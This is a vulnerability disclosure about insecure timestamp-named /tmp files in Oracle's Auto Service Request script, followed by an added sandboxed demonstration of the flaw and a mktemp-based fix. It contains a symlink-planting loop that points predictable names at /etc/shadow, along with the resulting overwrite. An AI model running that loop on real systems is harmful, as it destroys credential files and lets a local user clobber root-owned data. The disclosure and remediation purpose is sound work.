Oracle Auto Service Request /tmp file clobbering vulnerability
http://www.oracle.com/us/support/systems/premier/auto-service-request-155415.html
http://docs.oracle.com/cd/E18476_01/doc.220/e18478/asr.htm
I noticed it creates files insecurely in /tmp using timestamps instead of mkstemp(). You can clobber root-owned files if you know around what time the root administrator will be using this utility.
[larry@oracle-os-lab01 tmp]$ for x in `seq 500 999`; do ln -s /etc/shadow /tmp/status1_020213003$x; done
root executes the asr command:
[root@oracle-os-lab01 bin]# ./asr
register OR register [-e asr-manager-relay-url]: register ASR
unregister : unregister ASR
show_reg_status : show ASR registration status
test_connection : test connection to Oracle
.
.
.
version : show asr script version
exit
help : display a list of commands
? : display a list of commands
asr>
/etc/shadow is now overwritten with the contents of /tmp/status1_020213003722
root # cat /etc/shadow
id State Bundle
68 ACTIVE com.sun.svc.asr.sw_4.3.1
Fragments=69, 70
69 RESOLVED com.sun.svc.asr.sw-frag_4.3.1
Master=68
70 RESOLVED com.sun.svc.asr.sw-rulesdefinitions_4.3.1
Master=68
72 ACTIVE com.sun.svc.asr.sw.http.AsrHttpReceiver_1.0.0
Fragments=73
73 RESOLVED com.sun.svc.asr.sw.http-frag_1.0.0
Master=72
67 ACTIVE com.sun.svc.ServiceActivation_4.3.1
Problem code:
The asr binary is a wrapper for a Java class; the following snippet of code is where the error lies:
/sbin/sh:root@unix-solaris# grep -n tmp asr
409: file1=/tmp/status1_`date '+%m%d%y%H%M%S'`
410: file2=/tmp/status2_`date '+%m%d%y%H%M%S'`
411: file3=/tmp/status3_`date '+%m%d%y%H%M%S'`
557: file1=/tmp/status1_`date '+%m%d%y%H%M%S'`
681: file1=/tmp/status1_`date '+%m%d%y%H%M%S'`
691: file1=/tmp/status1_`date '+%m%d%y%H%M%S'`
706: file1=/tmp/parse_jetty_`date '+%m%d%y%H%M%S'`
710: file2=/tmp/parse_jetty_port_`date '+%m%d%y%H%M%S'`
797: file1=/tmp/status1_`date '+%m%d%y%H%M%S'`
987: hostnameTempFile=/tmp/status1_`date '+%m%d%y%H%M%S'`
988: tempFile=/tmp/status2_`date '+%m%d%y%H%M%S'`
989: tempHostname=/tmp/status3_`date '+%m%d%y%H%M%S'`
1303: file1=/tmp/status1_`date '+%m%d%y%H%M%S'`
1334: file1=/tmp/status1_`date '+%m%d%y%H%M%S'`
1343: file1=/tmp/status1_`date '+%m%d%y%H%M%S'`
1344: file2=/tmp/status2_`date '+%m%d%y%H%M%S'`
1345: file3=/tmp/status3_`date '+%m%d%y%H%M%S'`
1405: tempFile=/tmp/localsnmp_`date '+%m%d%y%H%M%S'`
2198: tempFile=/tmp/localsnmp_`date '+%m%d%y%H%M%S'`
This affects the software package on both Solaris and Linux.
Vendor notified about a month ago.
@_larry0
Larry W. Cashdollar
http://otiose.dhs.org/
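
Added example (not part of the advisory and not Oracle's code): the timestamp naming pattern from the grep output above next to a mktemp-based replacement, run inside a private scratch directory. The function names, the "victim" file and the sample data are constructed for illustration, and a mktemp(1) utility is assumed to be available.

```shell
#!/bin/sh
# Added example, not Oracle's code. Everything happens inside a private
# scratch directory; "victim" is a constructed stand-in for a file such as
# /etc/shadow, and the symlink plays the role of the pre-planted link.

# Pattern from the asr script: the name depends only on the clock.
unsafe_write() {            # $1 = dir, $2 = timestamp, $3 = data
    file1="$1/status1_$2"
    echo "$3" > "$file1"    # open() follows a symlink already at that name
}

# Hardened form: mktemp picks an unpredictable suffix and creates the file
# with O_CREAT|O_EXCL and mode 0600, so an existing name or symlink is
# never reused. The caller removes the file when done.
safe_write() {              # $1 = dir, $2 = data; prints the file created
    file1=$(mktemp "$1/status1_XXXXXXXXXX") || return 1
    echo "$2" > "$file1"
    echo "$file1"
}

# Prints the victim's content after one write through the chosen pattern.
demo() {                    # $1 = "unsafe" or "safe"
    scratch=$(mktemp -d) || return 1
    stamp=$(date '+%m%d%y%H%M%S')
    echo "original" > "$scratch/victim"
    # Constructed precondition: a link already sits at the predictable name.
    ln -s "$scratch/victim" "$scratch/status1_$stamp"
    case "$1" in
        unsafe) unsafe_write "$scratch" "$stamp" "bundle status" ;;
        safe)   safe_write "$scratch" "bundle status" >/dev/null ;;
    esac
    cat "$scratch/victim"
    rm -rf "$scratch"
}

echo "timestamp name -> victim contains: $(demo unsafe)"
echo "mktemp name    -> victim contains: $(demo safe)"
```

The same substitution applies to every `/tmp/..._`date ...`` assignment listed in the grep output; pairing it with a `trap 'rm -f "$file1"' EXIT` keeps the files from accumulating.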